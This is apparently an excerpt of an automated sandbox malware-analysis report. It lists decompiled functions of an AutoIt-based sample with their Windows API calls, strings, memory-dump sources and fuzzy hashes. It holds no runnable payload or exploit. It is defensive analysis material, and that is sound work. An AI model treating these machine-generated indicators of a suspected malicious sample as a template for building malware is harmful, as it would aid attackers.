                                                                                                                    • Opcode Fuzzy Hash: f9450eb33af22b0b2e9dab4b6fc6e1c659709b1fc34f383df6643e799559cfa3
                                                                                                                    • Instruction Fuzzy Hash: 31118F71500108BFEB128E64DC86BEB376DEB06374F618724F9A5971E0C771DC909B60
                                                                                                                    Function 003129AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312A22
                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00312A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: 5c36348a12e476d2d283e72d165075482bf8de96c813568faf7c55303ee4c590
                                                                                                                    • Instruction ID: f407ce0dbebf4e25f2c4cbe078ff83238b789d8a100743dc9555695e387b748c
                                                                                                                    • Opcode Fuzzy Hash: 5c36348a12e476d2d283e72d165075482bf8de96c813568faf7c55303ee4c590
                                                                                                                    • Instruction Fuzzy Hash: 00118E32901114AFDB3BDB98D844BEB77BCAF49310F164021E859E7290DB70ADAAC791
                                                                                                                    Function 003221D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0032222C
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00322255
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: 78318e4db39e852682fa8e9c7d8992b574de97a627c047ad3ac1daa9f205067c
                                                                                                                    • Instruction ID: 5aeb8970a1b669e98be8ec08784f16682579e68e0d4e9becd940fa17fd0065b3
                                                                                                                    • Opcode Fuzzy Hash: 78318e4db39e852682fa8e9c7d8992b574de97a627c047ad3ac1daa9f205067c
                                                                                                                    • Instruction Fuzzy Hash: 2711A070541335FEDB2A8F51AC85EBBFBACFF16751F10862AF91546400D2716990D6F0
                                                                                                                    Function 002C092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002B3C14,003752F8,?,?,?), ref: 002C096E
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • _wcscat.LIBCMT ref: 002F4CB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                    • String ID: S7
                                                                                                                    • API String ID: 257928180-3441049348
                                                                                                                    • Opcode ID: 2764b1578a8cf786d1d1e51546cdeedf8798bd6dc8e707eb6355bea5c7553c51
                                                                                                                    • Instruction ID: 684deff57e325bc6b79a7eb47f3464fd813364731ea3406db5e32155128bb176
                                                                                                                    • Opcode Fuzzy Hash: 2764b1578a8cf786d1d1e51546cdeedf8798bd6dc8e707eb6355bea5c7553c51
                                                                                                                    • Instruction Fuzzy Hash: 9011A934A25609DA9B51FB64C846FDD73E8AF08790F0045A6B549D3191DAB096A44F10
                                                                                                                    Function 00308E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00308E73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 117f774ebe20be276f7aba3b5fffe7e9d6408c7011ad184604153cf2b37f11ea
                                                                                                                    • Instruction ID: f57bc1dcc13d73d5d93bc2d85deb687e1eb743c6192a934aeb6c5e96965591a2
                                                                                                                    • Opcode Fuzzy Hash: 117f774ebe20be276f7aba3b5fffe7e9d6408c7011ad184604153cf2b37f11ea
                                                                                                                    • Instruction Fuzzy Hash: B8012871716229ABCF16FBA0CC669FE7368EF413A0F440A19F8755B2D1DF315818C690
                                                                                                                    Function 00308CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00308D6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 5828a27b7eac2455cf5e7796ab9a1de7956efef11572c49609ecbe3e9c082572
                                                                                                                    • Instruction ID: 140b8928471a515d2e289a7997f537db076f416d9e7e500afd779b49ec32f69f
                                                                                                                    • Opcode Fuzzy Hash: 5828a27b7eac2455cf5e7796ab9a1de7956efef11572c49609ecbe3e9c082572
                                                                                                                    • Instruction Fuzzy Hash: 4701F771B42509ABCF16EBA0C966EFF73ACDF15380F540119B841672D1DE105E18D6B1
                                                                                                                    Function 00308D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00308DEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 33efa4628bcc809c28a3124502a4a0274d44a931332029c5f19e424bb4ec48ed
                                                                                                                    • Instruction ID: d735947e6e1fdb61630f7ac2562c02b13d9bed4c5d15b9b9880825384d2d6e14
                                                                                                                    • Opcode Fuzzy Hash: 33efa4628bcc809c28a3124502a4a0274d44a931332029c5f19e424bb4ec48ed
                                                                                                                    • Instruction Fuzzy Hash: 0F01F271B46109ABCF12EBA4C962AFF73AC8F11380F144119B841672D2DE218E18D6B1
                                                                                                                    Function 0030C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0030C534
                                                                                                                      • Part of subcall function 0030C816: _memmove.LIBCMT ref: 0030C860
                                                                                                                      • Part of subcall function 0030C816: VariantInit.OLEAUT32(00000000), ref: 0030C882
                                                                                                                      • Part of subcall function 0030C816: VariantCopy.OLEAUT32(00000000,?), ref: 0030C88C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0030C556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                    • String ID: d}6
                                                                                                                    • API String ID: 2932060187-3853789388
                                                                                                                    • Opcode ID: d31a5a7c9ca550e28d2f2534872f3e865428aeb1a2818a0016fa70725dab9161
                                                                                                                    • Instruction ID: 4e1e86ab57e67da097bfc992838d9179a5cdcc24ed7830176f9aa40daec52d7d
                                                                                                                    • Opcode Fuzzy Hash: d31a5a7c9ca550e28d2f2534872f3e865428aeb1a2818a0016fa70725dab9161
                                                                                                                    • Instruction Fuzzy Hash: A8110C719007089FC721DFAAD8C489AF7F8FF08354B50862EE58AD7651E771AA48CF90
                                                                                                                    Function 00314F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                    • String ID: #32770
                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                    • Opcode ID: 5a9a7916789ce0425b6d7c53db1e05ea5f104ee9c9b64c699eabd2d8c55db938
                                                                                                                    • Instruction ID: ee07fdea90e6c6acfeb1c470b66e6ae3835e888da6b1adf580a22ed3ee3ce307
                                                                                                                    • Opcode Fuzzy Hash: 5a9a7916789ce0425b6d7c53db1e05ea5f104ee9c9b64c699eabd2d8c55db938
                                                                                                                    • Instruction Fuzzy Hash: 08E0D832A0062C2BD721DB99EC4AFE7F7ACEB49B70F010167FD04D3151E9609A958BE1
                                                                                                                    Function 002EB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002EB314: _memset.LIBCMT ref: 002EB321
                                                                                                                      • Part of subcall function 002D0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002EB2F0,?,?,?,002B100A), ref: 002D0945
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,002B100A), ref: 002EB2F4
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002B100A), ref: 002EB303
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002EB2FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                    • Opcode ID: 9648a81065d9f7f5b926b21b382e2e7106d57c8f8b046cf6c7c126c159104f30
                                                                                                                    • Instruction ID: 5cb05fb0736a4fd0f513d8b8a1078c3e66df5852470fa5f573c42437b19b322c
                                                                                                                    • Opcode Fuzzy Hash: 9648a81065d9f7f5b926b21b382e2e7106d57c8f8b046cf6c7c126c159104f30
                                                                                                                    • Instruction Fuzzy Hash: 35E06D746107418FD7229F29D5457877BE8AF00714F408D6DE886C7661E7B4D458CBA1
                                                                                                                    Function 00307C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00307C82
                                                                                                                      • Part of subcall function 002D3358: _doexit.LIBCMT ref: 002D3362
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message_doexit
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                    • Opcode ID: 4afe432c09fb1c975e1fc7cd5c12272b7454fee87486f2d6cb11c5042bae8027
                                                                                                                    • Instruction ID: 5e74cccab9b874e9fd8584da10d36083e8e6f128c7c4515fee9d39d406f4bc21
                                                                                                                    • Opcode Fuzzy Hash: 4afe432c09fb1c975e1fc7cd5c12272b7454fee87486f2d6cb11c5042bae8027
                                                                                                                    • Instruction Fuzzy Hash: 81D02B323C431837D10632B5AD47FCA36884F04F56F004412FB04591D349D15CD051E5
                                                                                                                    Function 002F1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 002F1775
                                                                                                                      • Part of subcall function 0032BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,002F195E,?), ref: 0032BFFE
                                                                                                                      • Part of subcall function 0032BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0032C010
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002F196D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                    • String ID: WIN_XPe
                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                    • Opcode ID: 9ca46a1132c15bd584500cd3768c526e48c5d76daba3440488bae2f94987c546
                                                                                                                    • Instruction ID: a5fd8be207b7fbd91cb2f29793898244512ed08212f85a08633764bbdb90e247
                                                                                                                    • Opcode Fuzzy Hash: 9ca46a1132c15bd584500cd3768c526e48c5d76daba3440488bae2f94987c546
                                                                                                                    • Instruction Fuzzy Hash: FEF0AC7082010DDFDB16EB55D994AFCF7B8AB58341FA400A5E106A6090D7754EA4DF60
                                                                                                                    Function 00335964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0033596E
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00335981
                                                                                                                      • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: 78c3b6e5ab7d116a177753396dd4c597ce1b69491cd7b47f45fd0b8be3c6b899
                                                                                                                    • Instruction ID: 9290eb26b6721521f79b580a02d9f042cee6bb5ae4b05cd7cc97deb1884bd060
                                                                                                                    • Opcode Fuzzy Hash: 78c3b6e5ab7d116a177753396dd4c597ce1b69491cd7b47f45fd0b8be3c6b899
                                                                                                                    • Instruction Fuzzy Hash: 29D0C932784711BAE669AB709C4BFD76A18AB55B55F000825B34AAA1E0C9E09800C654
                                                                                                                    Function 00335998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003359AE
                                                                                                                    • PostMessageW.USER32(00000000), ref: 003359B5
                                                                                                                      • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: f8d7bbae9b9d85b2e328e6e2bb92bda3b1e3cf34b3b7ba19e27ea1c8c2de267a
                                                                                                                    • Instruction ID: 93a48ae3f5d9184222b82ad32bd78015eb72ad2f7ba19d597d11a19d8b8a5b6a
                                                                                                                    • Opcode Fuzzy Hash: f8d7bbae9b9d85b2e328e6e2bb92bda3b1e3cf34b3b7ba19e27ea1c8c2de267a
                                                                                                                    • Instruction Fuzzy Hash: 7BD0C932780711BAE66AAB709C4BFD76A18AB59B55F400825B346EA1E0C9E0A800C658